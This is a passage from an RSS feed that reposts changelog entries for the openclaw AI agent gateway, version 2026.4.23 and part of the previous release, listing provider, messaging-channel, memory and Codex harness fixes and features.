<li>Agents/transport: propagate configured attempt timeouts into guarded per-request dispatchers, so slow local LLM calls such as Ollama no longer fail at Undici's default 60-second body timeout. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319424509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70829" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70829/hovercard" href="https://github.com/openclaw/openclaw/issues/70829">#70829</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319432428" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70831" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70831/hovercard" href="https://github.com/openclaw/openclaw/pull/70831">#70831</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DranboFieldston/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DranboFieldston">@DranboFieldston</a>.</li>
<li>Plugins/providers: mirror runtime auth choices in bundled provider manifests and detect <code>KIMI_API_KEY</code> for Moonshot/Kimi web search before plugin runtime loads. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/chat: register chat.send runs in the chat run registry so lifecycle error events reach the client instead of being silently dropped, fixing stuck 'waiting' state and /abort reporting no active run. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303442727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69747" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69747/hovercard" href="https://github.com/openclaw/openclaw/pull/69747">#69747</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangshu94/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangshu94">@wangshu94</a>.</li>
<li>Plugins/QQ Bot: enable the bundled qqbot plugin by default so its runtime dependency <code>@tencent-connect/qqbot-connector</code> is installed on first launch, unblocking the QR-code binding flow that dynamically imports the connector before any account is configured. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322023900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71051/hovercard" href="https://github.com/openclaw/openclaw/pull/71051">#71051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cxyhhhhh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cxyhhhhh">@cxyhhhhh</a>.</li>
<li>Gateway/agent RPC: register active <code>agent</code> runs into the chat abort controller map so <code>chat.abort</code> and <code>sessions.abort</code> can interrupt them, matching <code>chat.send</code> behavior and unblocking external runtimes that drive the Gateway through the public <code>agent</code> RPC. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323484703" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71128/hovercard" href="https://github.com/openclaw/openclaw/issues/71128">#71128</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324902312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71214" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71214/hovercard" href="https://github.com/openclaw/openclaw/pull/71214">#71214</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bitloi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bitloi">@bitloi</a>.</li>
<li>Matrix/CLI: pass resolved runtime config into verify commands, so <code>openclaw matrix verify status</code> and sibling verify subcommands no longer crash before acquiring the Matrix client. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321269249" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70992" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70992/hovercard" href="https://github.com/openclaw/openclaw/issues/70992">#70992</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323027440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71102" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71102/hovercard" href="https://github.com/openclaw/openclaw/pull/71102">#71102</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>.</li>
<li>Gateway/startup: await startup sidecars before channel monitors report ready, reducing Discord and plugin startup races while still keeping gateway boot observability intact.</li>
<li>Plugins/Google Meet: report required manual actions for Chrome joins, use browser automation for Meet entry, and persist the private-WS node opt-in so paired-node realtime sessions keep their intended network policy.</li>
<li>Slack: route native stream fallback replies through the normal chunked sender so long buffered Slack Connect responses are not dropped or duplicated. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323437182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71124" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71124/hovercard" href="https://github.com/openclaw/openclaw/pull/71124">#71124</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>WhatsApp: transcribe accepted voice notes before agent dispatch while keeping spoken transcripts out of command authorization. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236891684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64120" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64120/hovercard" href="https://github.com/openclaw/openclaw/pull/64120">#64120</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rogerdigital/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rogerdigital">@rogerdigital</a>.</li>
<li>Plugins/CLI: expose channel plugin CLI descriptors during discovery-mode plugin loads so snapshot registries keep channel commands visible without activating full runtimes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326405558" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71309" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71309/hovercard" href="https://github.com/openclaw/openclaw/pull/71309">#71309</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>WhatsApp: deliver media generated by tool-result replies while still suppressing text-only tool chatter. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205352281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60968" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60968/hovercard" href="https://github.com/openclaw/openclaw/pull/60968">#60968</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adaclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adaclaw">@adaclaw</a>.</li>
<li>Config/agents: accept <code>agents.list[].contextTokens</code> in strict config validation so per-agent overrides survive hot reload, letting <code>/status</code> reflect the configured model window instead of the 200k fallback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317533141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70692" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70692/hovercard" href="https://github.com/openclaw/openclaw/issues/70692">#70692</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325381239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71247" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71247/hovercard" href="https://github.com/openclaw/openclaw/pull/71247">#71247</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/statxc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/statxc">@statxc</a>.</li>
<li>Heartbeat: include async exec completion details in heartbeat prompts so command-finished notifications relay the actual output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324887008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71213" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71213/hovercard" href="https://github.com/openclaw/openclaw/pull/71213">#71213</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</li>
<li>Memory search: apply session visibility and agent-to-agent policy to session transcript hits, and keep <code>corpus=sessions</code> ranking scoped to session collections before result limiting. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318525947" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70761" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70761/hovercard" href="https://github.com/openclaw/openclaw/pull/70761">#70761</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nefainl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nefainl">@nefainl</a>.</li>
<li>Agents/sessions: stop session write-lock timeouts from entering model failover, so local lock contention surfaces directly instead of cascading across providers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289258810" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68700" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68700/hovercard" href="https://github.com/openclaw/openclaw/pull/68700">#68700</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MonkeyLeeT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MonkeyLeeT">@MonkeyLeeT</a>.</li>
<li>Auto-reply: run inbound reply delivery through <code>message_sending</code> hooks so plugins can transform or cancel generated replies before they are sent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308268444" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70118" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70118/hovercard" href="https://github.com/openclaw/openclaw/pull/70118">#70118</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>.</li>
<li>CI/release-checks: pass workflow inputs and matrix values through step environment variables instead of embedding them directly into <code>run:</code> shell commands, reducing template-injection surface in the cross-OS release-check workflow. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265486309" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66884" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66884/hovercard" href="https://github.com/openclaw/openclaw/pull/66884">#66884</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexlomt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexlomt">@alexlomt</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.23]]></title>
<description><![CDATA[2026.4.23
Changes

Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so openai/gpt-image-2 works without an OPENAI_API_KEY. Fixes #70703.
Providers/OpenRouter: add image generation and reference-image editing through image_generate, so OpenRouter image models...]]></description>
<link>https://tsecurity.de/de/3461974/downloads/openclaw-2026423/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461974/downloads/openclaw-2026423/</guid>
<pubDate>Fri, 24 Apr 2026 17:31:04 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.23</h2>
<h3>Changes</h3>
<ul>
<li>Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so <code>openai/gpt-image-2</code> works without an <code>OPENAI_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317685103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70703/hovercard" href="https://github.com/openclaw/openclaw/issues/70703">#70703</a>.</li>
<li>Providers/OpenRouter: add image generation and reference-image editing through <code>image_generate</code>, so OpenRouter image models work with <code>OPENROUTER_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4142164318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55066" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55066/hovercard" href="https://github.com/openclaw/openclaw/issues/55066">#55066</a> via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275765906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67668" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67668/hovercard" href="https://github.com/openclaw/openclaw/pull/67668">#67668</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/notamicrodose/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/notamicrodose">@notamicrodose</a>.</li>
<li>Image generation: let agents request provider-supported quality and output format hints, and pass OpenAI-specific background, moderation, compression, and user hints through the <code>image_generate</code> tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313875031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70503/hovercard" href="https://github.com/openclaw/openclaw/pull/70503">#70503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>.</li>
<li>Agents/subagents: add optional forked context for native <code>sessions_spawn</code> runs so agents can let a child inherit the requester transcript when needed, while keeping clean isolated sessions as the default; includes prompt guidance, context-engine hook metadata, docs, and QA coverage.</li>
<li>Agents/tools: add optional per-call <code>timeoutMs</code> support for image, video, music, and TTS generation tools so agents can extend provider request timeouts only when a specific generation needs it.</li>
<li>Memory/local embeddings: add configurable <code>memorySearch.local.contextSize</code> with a 4096 default so local embedding contexts can be tuned for constrained hosts without patching the memory host. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314612454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70544/hovercard" href="https://github.com/openclaw/openclaw/pull/70544">#70544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aalekh-sarvam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aalekh-sarvam">@aalekh-sarvam</a>.</li>
<li>Dependencies/Pi: update bundled Pi packages to <code>0.70.0</code>, use Pi's upstream <code>gpt-5.5</code> catalog metadata for OpenAI and OpenAI Codex, and keep only local <code>gpt-5.5-pro</code> forward-compat handling.</li>
<li>Codex harness: add structured debug logging for embedded harness selection decisions so <code>/status</code> stays simple while gateway logs explain auto-selection and Pi fallback reasons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318523130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70760/hovercard" href="https://github.com/openclaw/openclaw/pull/70760">#70760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Codex harness: route native <code>request_user_input</code> prompts back to the originating chat, preserve queued follow-up answers, and honor newer app-server command approval amendment decisions.</li>
<li>Codex harness/context-engine: redact context-engine assembly failures before logging, so fallback warnings do not serialize raw error objects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319234861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70809/hovercard" href="https://github.com/openclaw/openclaw/pull/70809">#70809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>WhatsApp/onboarding: keep first-run setup entry loading off the Baileys runtime dependency path, so packaged QuickStart installs can show WhatsApp setup before runtime deps are staged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320441218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70932/hovercard" href="https://github.com/openclaw/openclaw/issues/70932">#70932</a>.</li>
<li>Block streaming: suppress final assembled text after partial block-delivery aborts when the already-sent text chunks exactly cover the final reply, preventing duplicate replies without dropping unrelated short messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320362931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70921/hovercard" href="https://github.com/openclaw/openclaw/issues/70921">#70921</a>.</li>
<li>Codex harness/Windows: resolve npm-installed <code>codex.cmd</code> shims through PATHEXT before starting the native app-server, so <code>codex/*</code> models work without a manual <code>.exe</code> shim. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320274139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70913/hovercard" href="https://github.com/openclaw/openclaw/issues/70913">#70913</a>.</li>
<li>Slack/groups: classify MPIM group DMs as group chat context and suppress verbose tool/plan progress on Slack non-DM surfaces, so internal "Working…" traces no longer leak into rooms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320271144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70912/hovercard" href="https://github.com/openclaw/openclaw/issues/70912">#70912</a>.</li>
<li>Agents/replay: stop OpenAI/Codex transcript replay from synthesizing missing tool results while still preserving synthetic repair on Anthropic, Gemini, and Bedrock transport-owned sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208825313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61556/hovercard" href="https://github.com/openclaw/openclaw/pull/61556">#61556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VictorJeon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VictorJeon">@VictorJeon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram/media replies: parse remote markdown image syntax into outbound media payloads on the final reply path, so Telegram group chats stop falling back to plain-text image URLs when the model or a tool emits <code>![...](...)</code> instead of a <code>MEDIA:</code> token. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258333933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66191" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66191/hovercard" href="https://github.com/openclaw/openclaw/issues/66191">#66191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apezam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apezam">@apezam</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/WebChat: surface non-retryable provider failures such as billing, auth, and rate-limit errors from the embedded runner instead of logging <code>surface_error</code> and leaving webchat with no rendered error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308345521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70124" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70124/hovercard" href="https://github.com/openclaw/openclaw/issues/70124">#70124</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319670589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70848" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70848/hovercard" href="https://github.com/openclaw/openclaw/pull/70848">#70848</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/truffle-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/truffle-dev">@truffle-dev</a>.</li>
<li>WhatsApp: unify outbound media normalization across direct sends and auto-replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Memory/CLI: declare the built-in <code>local</code> embedding provider in the memory-core manifest, so standalone <code>openclaw memory status</code>, <code>index</code>, and <code>search</code> can resolve local embeddings just like the gateway runtime. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319498725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70836" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70836/hovercard" href="https://github.com/openclaw/openclaw/issues/70836">#70836</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319903672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70873/hovercard" href="https://github.com/openclaw/openclaw/pull/70873">#70873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattznojassist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattznojassist">@mattznojassist</a>.</li>
<li>Gateway/WebChat: preserve image attachments for text-only primary models by offloading them as media refs instead of dropping them, so configured image tools can still inspect the original file. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287666211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68513/hovercard" href="https://github.com/openclaw/openclaw/issues/68513">#68513</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066225308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44276/hovercard" href="https://github.com/openclaw/openclaw/issues/44276">#44276</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112734613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51656/hovercard" href="https://github.com/openclaw/openclaw/issues/51656">#51656</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309685353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70212/hovercard" href="https://github.com/openclaw/openclaw/issues/70212">#70212</a>.</li>
<li>Plugins/Google Meet: hang up delegated Twilio calls on leave, clean up Chrome realtime audio bridges when launch fails, and use a flat provider-safe tool schema.</li>
<li>Media understanding: honor explicit image-model configuration before native-vision skips, including <code>agents.defaults.imageModel</code>, <code>tools.media.image.models</code>, and provider image defaults such as MiniMax VL when the active chat model is text-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079114113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47614/hovercard" href="https://github.com/openclaw/openclaw/issues/47614">#47614</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231959911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63722/hovercard" href="https://github.com/openclaw/openclaw/issues/63722">#63722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292840857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69171/hovercard" href="https://github.com/openclaw/openclaw/issues/69171">#69171</a>.</li>
<li>Codex/media understanding: support <code>codex/*</code> image models through bounded Codex app-server image turns, while keeping <code>openai-codex/*</code> on the OpenAI Codex OAuth route and validating app-server responses against generated protocol contracts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309522289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70201/hovercard" href="https://github.com/openclaw/openclaw/issues/70201">#70201</a>.</li>
<li>Providers/OpenAI Codex: synthesize the <code>openai-codex/gpt-5.5</code> OAuth model row when Codex catalog discovery omits it, so cron and subagent runs do not fail with <code>Unknown model</code> while the account is authenticated.</li>
<li>Models/Codex: preserve Codex provider metadata when adding models from chat or CLI commands, so manually added Codex models keep the right auth and routing behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319321563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70820/hovercard" href="https://github.com/openclaw/openclaw/pull/70820">#70820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Providers/OpenAI: route <code>openai/gpt-image-2</code> through configured Codex OAuth directly when an <code>openai-codex</code> profile is active, instead of probing <code>OPENAI_API_KEY</code> first.</li>
<li>Providers/OpenAI: harden image generation auth routing and Codex OAuth response parsing so fallback only applies to public OpenAI API routes and bounded SSE results. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>OpenAI/image generation: send reference-image edits as guarded multipart uploads instead of JSON data URLs, restoring complex multi-reference <code>gpt-image-2</code> edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316931305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70642/hovercard" href="https://github.com/openclaw/openclaw/issues/70642">#70642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</li>
<li>Providers/OpenRouter: send image-understanding prompts as user text before image parts, restoring non-empty vision responses for OpenRouter multimodal models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312662772" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70410/hovercard" href="https://github.com/openclaw/openclaw/issues/70410">#70410</a>.</li>
<li>Providers/Google: honor the private-network SSRF opt-in for Gemini image generation requests, so trusted proxy setups that resolve Google API hosts to private addresses can use <code>image_generate</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269431435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67216/hovercard" href="https://github.com/openclaw/openclaw/issues/67216">#67216</a>.</li>
<li>Agents/transport: stop embedded runs from lowering the process-wide undici stream timeouts, so slow Gemini image generation and other long-running provider requests no longer inherit short run-attempt headers timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312763316" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70423/hovercard" href="https://github.com/openclaw/openclaw/issues/70423">#70423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
